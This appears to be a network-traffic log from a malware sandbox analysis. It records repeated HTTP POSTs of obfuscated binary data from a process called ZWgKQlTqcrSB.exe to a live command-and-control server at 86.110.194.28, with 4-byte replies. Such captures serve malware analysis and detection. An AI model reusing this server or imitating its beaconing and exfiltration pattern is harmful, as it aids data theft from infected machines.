Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49940 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:29.857238054 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
Jan 3, 2025 07:58:30.214934111 CET | 2516 | OUT | Data Raw: 5e 57 5e 5b 58 5c 55 5a 54 5b 59 5a 5b 5e 57 5c 5f 5c 5a 5e 52 51 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^W^[X\UZT[YZ[^W\_\Z^RQPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&?."*<T%/*;=0&%P"*7(Z39?0?,R+9#Y'$X.
Jan 3, 2025 07:58:30.559382915 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:30.695372105 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:30 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49948 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:30.905635118 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2512
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:58:31.261854887 CET | 2512 | OUT | Data Raw: 5e 55 5e 58 58 5b 50 5e 54 5b 59 5a 5b 57 57 58 5f 54 5a 55 52 53 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^U^XX[P^T[YZ[WWX_TZURSPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&B+!\!*&,B>1'"1?69P#4'4E'//)9#Y'$X.-
Jan 3, 2025 07:58:31.582856894 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:31.710833073 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:31 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49957 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:31.842695951 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:58:32.199467897 CET | 2516 | OUT | Data Raw: 5b 57 5e 5d 5d 5b 55 5b 54 5b 59 5a 5b 5e 57 5e 5f 56 5a 59 52 51 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [W^]][U[T[YZ[^W^_VZYRQPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C?Z":8% *;=$$-X%,*6!;737'8U()#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:32.531033039 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:32.658910990 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:32 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49963 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:32.780678988 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:33.136775970 CET | 2516 | OUT | request body
Jan 3, 2025 07:58:33.489886045 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:33.624320984 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49969 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:33.751686096 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:34.105530024 CET | 2516 | OUT | request body
Jan 3, 2025 07:58:34.522464037 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49975 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:34.581729889 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2108
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:34.933629036 CET | 2108 | OUT | request body
Jan 3, 2025 07:58:35.259982109 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:35.386782885 CET | 380 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49976 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:34.705064058 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:35.058855057 CET | 2512 | OUT | request body
Jan 3, 2025 07:58:35.395519018 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:35.522759914 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49985 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:35.660449982 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Jan 3, 2025 07:58:36.012002945 CET | 2516 | OUT | request body
Jan 3, 2025 07:58:36.394627094 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:36.528743029 CET | 151 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49993 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:36.653472900 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:37.012168884 CET | 2516 | OUT | request body
Jan 3, 2025 07:58:37.352690935 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:37.491437912 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49999 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:37.628016949 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:37.980556011 CET | 2516 | OUT | Data Raw: 5b 54 5e 5d 58 5e 55 5c 54 5b 59 5a 5b 53 57 5c 5f 57 5a 5d 52 54 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T^]X^U\T[YZ[SW\_WZ]RTPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&?5^"9/&,B)-$4!Y',:"-P74X$ @3<<)#Y'$X.1
Jan 3, 2025 07:58:38.333779097 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:38.468383074 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 50005 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:38.596811056 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:38.949265957 CET | 2516 | OUT | Data Raw: 5e 56 5b 5a 58 58 50 50 54 5b 59 5a 5b 50 57 5a 5f 5c 5a 59 52 5c 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^V[ZXXPPT[YZ[PWZ_\ZYR\PAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&D<.2" S$<+=("[$%]&?%"> 33_('/R)9#Y'$X.
Jan 3, 2025 07:58:39.295346022 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:39.425709009 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.4 | 50016 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:39.554532051 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:39.902462006 CET | 2516 | OUT | Data Raw: 5e 50 5e 50 58 5d 50 5d 54 5b 59 5a 5b 50 57 59 5f 5d 5a 58 52 56 50 43 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^P^PX]P]T[YZ[PWY_]ZXRVPCZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&+\5/%,?*+%7=%%R 7)!;/')&?$(9#Y'$X.
Jan 3, 2025 07:58:40.234961987 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:40.363173962 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.4 | 50022 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:40.408843040 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2108
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.4 | 50023 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:40.513061047 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:40.871166945 CET | 2516 | OUT | Data Raw: 5e 52 5e 5e 58 5f 50 5b 54 5b 59 5a 5b 54 57 5e 5f 56 5a 5e 52 5d 50 44 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^R^^X_P[T[YZ[TW^_VZ^R]PDZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&B?5\!*,%Z,)*^$42<)R '"#8[0?&<?<)#Y'$X.-
Jan 3, 2025 07:58:41.214803934 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:41.349225044 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.4 | 50029 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:41.490739107 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Jan 3, 2025 07:58:41.839940071 CET | 2516 | OUT | Data Raw: 5b 50 5e 59 5d 5e 50 5d 54 5b 59 5a 5b 56 57 58 5f 53 5a 55 52 57 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [P^Y]^P]T[YZ[VWX_SZURWPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(>&!0&Z?>8>X04!]'?:!7*#$7',#?#Y'$X.%
Jan 3, 2025 07:58:42.188611984 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:42.320246935 CET | 151 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.4 | 50035 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:42.456325054 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:42.808912039 CET | 2516 | OUT | Data Raw: 5e 51 5e 5a 5d 5d 50 50 54 5b 59 5a 5b 50 57 52 5f 51 5a 5c 52 53 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^Q^Z]]PPT[YZ[PWR_QZ\RSPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+.2!)?%8*6Y$.%,)"-#(+');$,/))#Y'$X.
Jan 3, 2025 07:58:43.163222075 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:43.293976068 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.4 | 50046 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:43.424702883 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:44.139565945 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:44.270620108 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.4 | 50052 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:44.412421942 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:45.090997934 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:45.222769022 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 50058 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:45.374135971 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 50059 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:45.548806906 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2092
Expect: 100-continue
